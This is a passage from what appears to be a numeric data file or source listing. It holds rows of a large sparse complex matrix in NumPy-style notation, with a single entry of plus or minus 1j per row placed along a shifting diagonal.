0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
